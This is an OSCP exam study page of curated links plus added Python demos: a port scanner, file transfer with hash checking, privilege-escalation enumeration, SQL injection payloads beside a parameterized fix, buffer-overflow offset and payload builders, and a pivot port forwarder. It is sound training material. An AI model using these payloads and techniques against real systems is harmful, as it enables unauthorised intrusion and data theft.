# OSCP - One Page Repository

#### Hello Everyone

#### This is the one page repository for OSCP learners.

### 1. Kali Linux Basic Knowledge

* Online Course Link: <https://kali.training/lessons/introduction/>
* Book Link: <https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf>

Hands on challenge to get comfortable with Linux:

* Overthewire Bandit: <https://overthewire.org/wargames/bandit/>
* Root me <https://www.root-me.org/?lang=en>
* Cmdchallenge.com: <https://cmdchallenge.com/>
* HackerRank Linux Shell: <https://www.hackerrank.com/domains/shell>

### 2. Learn Basic Bash Scripting and Python

* <https://guide.bash.academy/>
* <https://www.learnpython.org/>

### 3. Recon - Learn About Network Reconnaissance

* Nmap Resources
  * Nmap Official Guide - <https://nmap.org/book/toc.html>
  * SANS Nmap cheat sheet - <https://www.sans.org/blog/sans-pen-test-cheat-sheet-nmap-v1-1/>
  * <https://medium.com/@infosecsanyam/nmap-cheat-sheet-nmap-scanning-types-scanning-commands-nse-scripts-868a7bd7f692>
  * <https://blog.zsec.uk/nmap-rtfm/>
* Service Enumeration
  * <https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/>
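What nmap does in a plain connect scan (`-sT`) plus banner grabbing is simple enough to write yourself, and doing it once makes the scan output much easier to interpret. The script below is an added example for this page, not code from nmap or from any of the resources linked above: it scans a port range with a thread pool, records whatever the service sends on connect, and starts a constructed fake service on 127.0.0.1 so it runs offline. Point `scan()` at a lab host and a real port range to use it for real; the banner text and the fake service are constructed for the demo.

```python
"""TCP connect scan with banner grabbing (added example, not from the page).

A constructed fake service on 127.0.0.1 stands in for the target so the
script runs offline; point scan() at a real host/port range in the lab.
"""
import socket
import socketserver
import threading
from concurrent.futures import ThreadPoolExecutor


def grab_banner(host, port, timeout=1.0):
    """Return (port, is_open, banner).

    A successful connect() is what makes a port 'open' in a connect scan
    (nmap -sT). Many services (FTP, SSH, SMTP) speak first, so we read
    briefly after connecting; silence just means an empty banner.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
            return port, True, data.decode("utf-8", "replace").strip()
    except OSError:  # refused, unreachable, or connect timed out
        return port, False, ""


def scan(host, ports, workers=50):
    """Scan `ports` concurrently; return {open_port: banner}."""
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for port, is_open, banner in pool.map(lambda p: grab_banner(host, p), ports):
            if is_open:
                results[port] = banner
    return results


# --- constructed lab target: a service that announces itself on connect ---
FAKE_BANNER = b"220 lab-ftp (constructed banner) ready\r\n"


class _BannerHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.sendall(FAKE_BANNER)


def start_fake_service(host="127.0.0.1"):
    """Bind an ephemeral port (0) so the demo never collides with a real service."""
    srv = socketserver.ThreadingTCPServer((host, 0), _BannerHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_fake_service()
    target_port = srv.server_address[1]
    found = scan("127.0.0.1", range(target_port - 3, target_port + 4))
    for port, banner in sorted(found.items()):
        print(f"{port}/tcp open  {banner or '(no banner)'}")
    srv.shutdown()
    srv.server_close()
```

nmap's `-sV` goes much further (per-service probe strings and a fingerprint database), which is why you still run it; this only shows what the open/closed decision and a banner actually are, and why a service that does not speak first shows up as open with no banner.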

### 4. Vulnerable Machines

Now move on to vulnerable machines. There are two main sites for practising on them: **Hack The Box and VulnHub.** Many people in the infosec community have written blog walkthroughs of these machines. Start by reading the walkthroughs for five machines and work out how the author approached each box (enumerate first, then exploit, then escalate privileges) before you attempt one blind.

* <https://www.hackthebox.eu/login>
* <https://www.vulnhub.com/>

**TJNull maintains a list of OSCP-like boxes.**

* Google Sheet listing the VulnHub and Hack The Box boxes: <https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8>

![Vulnhub List](/files/-M43yyD06-liQa0x2hly)

![Hackthebox List](/files/-M43z830X-yUQT10tKdW)

### 5. Public Exploits

Much of the time in OSCP you will be running a public exploit against a target to see whether it gets you a shell. Often the exploit will not work as downloaded: you will usually have to change the target IP and port, sometimes offsets or a return address, and frequently the embedded shellcode (for example regenerating it so the reverse shell connects back to your own address). Read the code well enough to know exactly what it does before you run it against a machine.

* Exploit-DB - <https://www.exploit-db.com/>
* SearchSploit - offline copy of the Exploit-DB archive that ships with Kali - <https://www.exploit-db.com/searchsploit>
* Packet Storm - <https://packetstormsecurity.com/files/tags/exploit/>

### 6. File Transfer

There are multiple ways to transfer files from the attacker's machine to the target; which one works depends on what is installed on the target, so know several. Whatever the method, compare the file's hash on both ends afterwards: a truncated or mangled binary is a common reason an exploit or enumeration script "does not work".

* **Windows**
  * <https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html>
  * VBS Script
  * SMB Server
  * HTTP Server
  * FTP Server
  * TFTP Server
  * Powershell
  * Debug.exe
  * Certutil
* **Linux**
  * Python Server
  * Curl
  * Wget
  * Netcat
  * FTP
  * PHP
  * SCP - SSH
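The HTTP route is the one you will use most, and the step people skip is verifying what actually landed on the target. The following added example (written for this page, not taken from the linked guide) does the attacker side in-process, the same thing `python3 -m http.server` does, pulls the file the way `wget`, `curl -o` or `certutil -urlcache -split -f` would, and compares SHA-256 hashes on both ends. The staged file and its contents are constructed, and everything runs on 127.0.0.1.

```python
"""Stage a file over HTTP and pull it down with an integrity check (added example, not from the page).

Attacker side is what `python3 -m http.server` does; the target side is what
`wget`, `curl -o` or `certutil -urlcache -split -f` do. Both run on 127.0.0.1
here so the example works offline.
"""
import functools
import hashlib
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.request


def sha256_of(path, chunk=1 << 16):
    """Hash a file in chunks; compare this on both ends after every transfer."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo output clean
        pass


def serve_directory(directory, bind="127.0.0.1", port=0):
    """Serve `directory` over HTTP in a background thread; port 0 picks a free port.
    On a real engagement bind to your VPN interface address and a port the target can reach."""
    handler = functools.partial(_QuietHandler, directory=directory)
    srv = socketserver.ThreadingTCPServer((bind, port), handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(url, dest, timeout=10):
    """Download `url` to `dest`, streaming to disk. Proxies are disabled explicitly so a
    stray http_proxy variable cannot redirect a 127.0.0.1 download."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(url, timeout=timeout) as resp, open(dest, "wb") as out:
        for block in iter(lambda: resp.read(1 << 16), b""):
            out.write(block)
    return dest


def transfer_and_verify(directory, filename, dest, expected_sha256, bind="127.0.0.1"):
    """Round trip: serve, download, stop serving, then check the hash."""
    srv, port = serve_directory(directory, bind)
    try:
        fetch(f"http://{bind}:{port}/{filename}", dest)
    finally:
        srv.shutdown()
        srv.server_close()
    return sha256_of(dest) == expected_sha256


def demo_round_trip(content=b"#!/bin/sh\necho constructed payload\n"):
    """Offline demo: stage `content` as tool.sh (a constructed stand-in for a tool you
    would upload), pull it, verify. Returns (hash_matched, bytes_received)."""
    with tempfile.TemporaryDirectory() as attacker_dir, tempfile.TemporaryDirectory() as target_dir:
        src = os.path.join(attacker_dir, "tool.sh")
        with open(src, "wb") as f:
            f.write(content)
        dest = os.path.join(target_dir, "tool.sh")
        matched = transfer_and_verify(attacker_dir, "tool.sh", dest, sha256_of(src))
        with open(dest, "rb") as f:
            received = f.read()
    return matched, received


if __name__ == "__main__":
    matched, received = demo_round_trip()
    print(f"{len(received)} bytes received, sha256 {'matches' if matched else 'MISMATCH'}")
```

On a Windows target without `curl`, `certutil -hashfile <file> SHA256` gives you the hash for the comparison; on Linux it is `sha256sum`.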

### 7. Privilege Escalation

* For Practice on Local Machine:
  * <https://github.com/sagishahar/lpeworkshop>
* Windows Privilege Escalation
  * <http://www.fuzzysecurity.com/tutorials/16.html>
  * <https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/>
  * <https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/>
* Linux Privilege Escalation
  * <https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/>
  * GTFOBins - <https://gtfobins.github.io/>
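The Linux guides above all begin with the same handful of checks, and it is worth knowing what the enumeration scripts are actually looking for before you trust their output. The added example below (written for this page; not code from LinEnum, linPEAS or any linked guide) implements three of them in Python: SUID/SGID binaries, writable directories on `PATH`, and world-writable files. It runs them against a constructed sandbox in a temporary directory containing a fake SUID file, a 0777 scripts directory and a 0666 config file; the sandbox layout and file names are constructed.

```python
"""Quick Linux privilege-escalation enumeration (added example, not from the page).

Three checks LinEnum/linPEAS-style scripts start with: SUID/SGID binaries
(cross-check the names against GTFOBins), writable directories on PATH (a
cron job or sudo rule that calls a command by bare name can be hijacked from
one), and world-writable files. A constructed sandbox under a temp dir lets
the demo run without touching the real filesystem; pass ["/"] to the
find_* functions on a real box.
"""
import os
import stat
import tempfile


def _regular_files(roots):
    """Yield (path, lstat) for every regular file under `roots`, skipping unreadable dirs."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    yield path, st


def find_setid_binaries(roots):
    """Files with the SUID or SGID bit set (like `find / -perm -4000 -o -perm -2000`)."""
    return sorted(p for p, st in _regular_files(roots) if st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def world_writable_files(roots):
    """Files anyone can modify (like `find / -perm -o+w -type f`)."""
    return sorted(p for p, st in _regular_files(roots) if st.st_mode & stat.S_IWOTH)


def writable_path_dirs(path_env):
    """PATH entries the current user can write to. A command invoked by bare name from
    a privileged context (cron, sudo, a SUID wrapper) can be shadowed from one of these."""
    seen, out = set(), []
    for d in path_env.split(os.pathsep):
        if d and d not in seen:
            seen.add(d)
            if os.path.isdir(d) and os.access(d, os.W_OK):
                out.append(d)
    return out


def build_sandbox(base):
    """Constructed layout: a fake SUID binary, a world-writable bin dir, a 0666 config."""
    suid = os.path.join(base, "usr", "bin", "fake-suid")
    loose_bin = os.path.join(base, "opt", "scripts")
    conf = os.path.join(base, "etc", "app.conf")
    for d in (os.path.dirname(suid), loose_bin, os.path.dirname(conf)):
        os.makedirs(d, exist_ok=True)
    for path, mode in ((suid, 0o4755), (conf, 0o666)):
        with open(path, "wb") as f:
            f.write(b"constructed\n")
        os.chmod(path, mode)
    os.chmod(loose_bin, 0o777)
    return suid, loose_bin, conf


def enumerate_sandbox():
    """Run all three checks inside a temp sandbox; returns findings relative to the sandbox root."""
    with tempfile.TemporaryDirectory() as base:
        _suid, loose_bin, _conf = build_sandbox(base)
        fake_path = os.pathsep.join(["/usr/bin", loose_bin, "/bin"])  # constructed PATH
        rel = lambda p: os.path.relpath(p, base)
        return {
            "setid": [rel(p) for p in find_setid_binaries([base])],
            "writable_path": [rel(d) for d in writable_path_dirs(fake_path)],
            "world_writable": [rel(p) for p in world_writable_files([base])],
        }


if __name__ == "__main__":
    for check, hits in enumerate_sandbox().items():
        print(f"{check}: {hits}")
```

Every SUID hit should be looked up on GTFOBins by binary name; the real scripts add many more checks (kernel version, sudo rules, cron, capabilities, credentials in files), but these three are the ones you can verify by hand in a minute.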

### 8. Web App Vulnerabilities

* SQL Injection - <http://pentestmonkey.net/category/cheat-sheet/sql-injection>
* Remote File Inclusion - <https://sushant747.gitbooks.io/total-oscp-guide/remote_file_inclusion.html>
* Local File Inclusion - <https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/>
* Bypass File upload - <https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf>
* Vulnerable Applications for Practice
  * OWASP Juice Shop: <https://www.owasp.org/index.php/OWASP_Juice_Shop_Project>
  * Metasploitable 2
  * bWAPP
  * Mutillidae
  * DVWA - <http://www.dvwa.co.uk/>
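The SQL injection cheat sheet above lists payloads; the following added example (written for this page, not taken from pentestmonkey's sheet) shows why they work by putting the vulnerable query next to its parameterized fix, against an in-memory SQLite table with constructed users so it runs offline. The first payload comments out the password check for an authentication bypass; the second appends a `UNION` to a search feature to pull a column it was never meant to return. The table layout, usernames and passwords are all constructed.

```python
"""SQL injection: the vulnerable query beside its parameterized fix (added example, not from the page).

Uses an in-memory SQLite database with constructed rows so it runs offline; the
same string-concatenation bug looks identical in PHP/MySQL behind a real login form.
"""
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "constructed-admin-pw"), ("bob", "hunter2")],  # constructed rows
    )
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so a quote ends the string and a
    comment marker discards the rest of the WHERE clause."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterized: values travel separately from the SQL, so a quote is just data."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def search_vulnerable(conn, term):
    """A 'search users' feature with the same flaw; the result list is attacker-visible,
    which is what makes UNION-based extraction work."""
    query = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [row[0] for row in conn.execute(query)]


def search_safe(conn, term):
    query = "SELECT username FROM users WHERE username LIKE ?"
    return [row[0] for row in conn.execute(query, (f"%{term}%",))]


# Classic payloads: close the string, then comment out the rest / append a UNION
# whose column count (1) matches the original SELECT.
AUTH_BYPASS = "admin' -- "
UNION_DUMP = "' UNION SELECT password FROM users -- "


if __name__ == "__main__":
    conn = build_db()
    print("bypass vs vulnerable login:", login_vulnerable(conn, AUTH_BYPASS, "wrong"))
    print("bypass vs safe login:      ", login_safe(conn, AUTH_BYPASS, "wrong"))
    print("union vs vulnerable search:", search_vulnerable(conn, UNION_DUMP))
    print("union vs safe search:      ", search_safe(conn, UNION_DUMP))
```

Against a real target the same two ideas are what sqlmap automates: break the query syntax to confirm the injection, then pick the technique (UNION, boolean, time-based) by which the application leaks data.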

### 9. Buffer Overflow

* Exploiting Simple Buffer Overflow on Win 32 <https://www.pentesteracademy.com/course?id=13>
* Buffer Overflow for Dummies - <https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481>
* For practice:
  * Windows binaries (recommended: run these on 32-bit Windows 7 or XP):
    * Brainpan machine - <https://www.vulnhub.com/entry/brainpan-1,51/>
    * Vulnserver: <https://samsclass.info/127/proj/vuln-server.htm>
    * Minishare 1.4.1: <https://www.exploit-db.com/exploits/636>
    * Savant Web Server 3.1: <https://www.exploit-db.com/exploits/10434>
    * Freefloat FTP Server 1.0: <https://www.exploit-db.com/exploits/40673>
    * Core FTP Server 1.2: <https://www.exploit-db.com/exploits/39480>
    * SLMail 5.5 - <https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe>
  * Linux binaries:
    * Linux Buffer Overflow: <https://samsclass.info/127/proj/lbuf1.htm>
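Every Windows binary in the list above is solved with the same sequence: crash the service with a cyclic pattern, read EIP in the debugger, compute the offset, find bad characters, then lay out filler, return address, NOP sled and shellcode. The added example below (written for this page; it is not msf-pattern_create, mona or code from any linked resource) reimplements those helpers in Python and stands in for the debugger with a simulated 32-bit stack frame so you can check the arithmetic offline. The buffer size, the `JMP ESP` address and the shellcode bytes in the demo are placeholders.

```python
"""Offset discovery and payload layout for a classic stack overflow (added example, not from the page).

Reimplements the helpers every OSCP write-up uses (msf-pattern_create and
msf-pattern_offset), plus the bad-character string and the final buffer
layout. A simulated 32-bit frame stands in for the debugger so it runs offline.
"""
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every aligned 3-byte triple is unique,
    so the 4 bytes that land in EIP identify their position (max 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip, length=20280):
    """Offset of the bytes in EIP within the pattern. `eip` is the value the debugger
    shows (an int; x86 stores it little-endian) or the raw 4 bytes from memory."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    idx = cyclic_pattern(length).find(needle)
    return idx if idx >= 0 else None


def badchar_string(exclude=(0x00,)):
    """Every byte value except the ones already known to break the target (0x00 always).
    Send it after the filler, compare memory in the debugger, and add any byte that is
    mangled or truncates the string to `exclude` on the next round."""
    return bytes(b for b in range(256) if b not in exclude)


def build_payload(offset, jmp_esp, shellcode, nop_sled=16):
    """Final layout: filler | EIP = address of a JMP ESP (little-endian) | NOP sled | shellcode.
    The JMP ESP must come from a module without ASLR/rebasing and contain no bad chars."""
    return b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nop_sled + shellcode


def simulate_crash(buf, buffer_size):
    """Simulated 32-bit frame: [buffer_size bytes of buffer][saved EBP][return address].
    Returns the value that would be in EIP when the function returns, as the debugger shows it."""
    ret_slot = buf[buffer_size + 4 : buffer_size + 8]
    return struct.unpack("<I", ret_slot.ljust(4, b"\x00"))[0]


if __name__ == "__main__":
    BUFFER_SIZE = 500                # placeholder: the real value is whatever the binary allocates
    eip = simulate_crash(cyclic_pattern(1000), BUFFER_SIZE)
    offset = pattern_offset(eip)
    print(f"EIP = 0x{eip:08x} -> offset {offset}")
    payload = build_payload(offset, 0xDEADBEEF, b"\xcc" * 32)  # placeholder JMP ESP and INT3 shellcode
    print(f"payload length {len(payload)}, EIP bytes {payload[offset:offset + 4].hex()}")
```

The thing the simulation makes obvious is that the offset (504 here) is the buffer size plus the saved EBP, not the buffer size itself, which is why you always derive it from EIP rather than guessing it from the source.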

### 10. Pivoting & Port Forwarding

* Abatchy’s Port Forwarding Guide: <https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide>
* Windows Port Forwarding: <http://woshub.com/port-forwarding-in-windows/>
* SSH Tunneling Explained: <https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/>
* Understanding Proxy Tunnels: <https://www.offensive-security.com/metasploit-unleashed/proxytunnels/>
* Explore Hidden Networks with Double Pivoting: <https://pentest.blog/explore-hidden-networks-with-double-pivoting/>
* 0xdf hacks stuff. Pivoting and Tunneling: <https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html>
* Tools:
  * sshuttle: <https://github.com/sshuttle/sshuttle>
  * proxychains: <https://github.com/haad/proxychains>
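An SSH local forward (`ssh -L`) is just a process that accepts connections on one side and relays the bytes to a host only it can reach. The added example below (written for this page; not code from sshuttle, proxychains or any linked guide) is such a forwarder in Python, the kind of thing you would run on a pivot when SSH is not available, plus a constructed echo service standing in for the internal target so the whole demo runs on 127.0.0.1. Addresses and ports in the demo are constructed.

```python
"""A userland TCP port forwarder, what `ssh -L` or a socat relay does (added example, not from the page).

Run it on the pivot host: it listens on one address and relays each connection to a
target that only the pivot can reach. A constructed echo service stands in for the
internal target so the demo runs entirely on 127.0.0.1.
"""
import socket
import socketserver
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the far side sees the EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class _Relay(socketserver.BaseRequestHandler):
    """One relayed connection: two pump threads, one per direction."""

    def handle(self):
        try:
            upstream = socket.create_connection(self.server.target, timeout=5)
        except OSError:
            return  # target unreachable from the pivot; drop the client
        upstream.settimeout(None)
        with upstream:
            t = threading.Thread(target=_pump, args=(upstream, self.request), daemon=True)
            t.start()
            _pump(self.request, upstream)
            t.join()


class Forwarder(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, listen, target):
        self.target = target  # (host, port) reachable only from the pivot
        super().__init__(listen, _Relay)


def start_forwarder(listen_host, listen_port, target_host, target_port):
    """Relay listen_host:listen_port -> target_host:target_port in the background (port 0 = any free port)."""
    fwd = Forwarder((listen_host, listen_port), (target_host, target_port))
    threading.Thread(target=fwd.serve_forever, daemon=True).start()
    return fwd


# --- constructed "internal" service: echoes whatever it receives ---
class _Echo(socketserver.BaseRequestHandler):
    def handle(self):
        while True:
            data = self.request.recv(4096)
            if not data:
                return
            self.request.sendall(data)


def start_echo(host="127.0.0.1"):
    srv = socketserver.ThreadingTCPServer((host, 0), _Echo)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def send_through(host, port, payload, timeout=5):
    """Client side: connect, send, half-close, read until EOF. Returns what came back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    echo = start_echo()                                   # the "internal" host
    fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", echo.server_address[1])
    print(send_through("127.0.0.1", fwd.server_address[1], b"hello through the pivot"))
    fwd.shutdown(); fwd.server_close(); echo.shutdown(); echo.server_close()
```

To use it as a real pivot, listen on the pivot's address facing you and point the target at the internal host; tools on your side then talk to the pivot's port as if it were the internal service. The half-close handling in `_pump` is the part people get wrong when writing these by hand: without it, protocols that end a request with EOF (like a plain `nc` upload) hang.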


#### Youtube Channels for OSCP related HTB Boxes writeups

* IppSec - TJNull OSCP list playlist: <https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf>
* <https://www.youtube.com/watch?v=PP32yAtuMy8&list=PLYu4I0o3DfjfizB6wcSmKDIvQxJ5NXM2y>
* <https://www.youtube.com/watch?v=kWTnVBIpNsE&list=PLnPxWPfV-DjyS8PIqfYa8LT4LHH8QmunZ>
* IPPSEC - <https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/playlists>


### Tool Set

* **Web Recon**
  * Dirsearch: <https://github.com/maurosoria/dirsearch>
  * Dirbuster: <https://tools.kali.org/web-applications/dirbuster>
  * Gobuster: <https://github.com/OJ/gobuster>
  * Wfuzz: <https://github.com/xmendez/wfuzz>
* **SQL**
  * SQLmap: <https://github.com/sqlmapproject/sqlmap/wiki/Usage>
  * NoSQLMap: <https://github.com/codingo/NoSQLMap>
  * SQLNinja: <http://sqlninja.sourceforge.net/>
* **Windows Privilege Escalation**
  * winPEAS
  * Windows Exploit Suggester - <https://github.com/GDSSecurity/Windows-Exploit-Suggester>
  * PowerUp
  * SharpUp
  * Seatbelt
  * Sherlock - <https://github.com/rasta-mouse/Sherlock>
  * Windows Priv Checker
  * JAWS - <https://github.com/411Hall/JAWS>
* **Linux Privilege Escalation**
  * Linux Smart Enumeration
  * pspy64
  * LinEnum - <https://github.com/rebootuser/LinEnum>
  * linPEAS
  * LPE
  * Linux Exploit Suggester
  * BeRoot
  * Bashark
  * Linux Priv Checker
* **Password Cracking**
  * John the Ripper - <https://www.openwall.com/john/>
  * Hashcat: <https://hashcat.net/hashcat/>
  * Online (network login) brute-forcing tools, which try passwords against a live service rather than a captured hash:
    * THC Hydra: <https://github.com/vanhauser-thc/thc-hydra>
    * Medusa: <http://h.foofus.net/?page_id=51>
* **Wordlist generators:**
  * CeWL: <https://digi.ninja/projects/cewl.php>
  * Crunch: <https://tools.kali.org/password-attacks/crunch>
* **Wordlists:**
  * In Kali: `/usr/share/wordlists` (rockyou ships as `rockyou.txt.gz` and must be gunzipped first)
  * SecLists: `apt-get install seclists`; Daniel Miessler's password lists are at <https://github.com/danielmiessler/SecLists/tree/master/Passwords>
* **Online hash lookup services** (fine for lab hashes, but treat anything you submit as public and never upload hashes from a real engagement):
  * <https://hashkiller.co.uk/Cracker>
  * <https://www.cmd5.org/>
  * <https://www.onlinehashcrack.com/>
  * <https://gpuhash.me/>
  * <https://crackstation.net/>

### Other OSCP guides:

I took some of the content here from the OSCP guides below.

* <https://sushant747.gitbooks.io/>
* <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits>
* <https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html>
* <https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html>
* <https://411hall.github.io/OSCP-Preparation>
* <https://www.gitbook.com/book/sushant747/total-oscp-guide>
* <http://0xc0ffee.io/blog/OSCP-Goldmine>
* <https://h4ck.co/oscp-journey-exam-lab-prep-tips/>
* <https://tulpa-security.com/2016/09/11/review-oscp-and-pwk/>
* <http://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/>
* Other Links:
  * <https://practicalpentestlabs.com/>
  * <https://immersivelabs.co.uk/>
  * <http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>
  * <https://maikthulhu.github.io/2017-11-20-onenote-layout/>

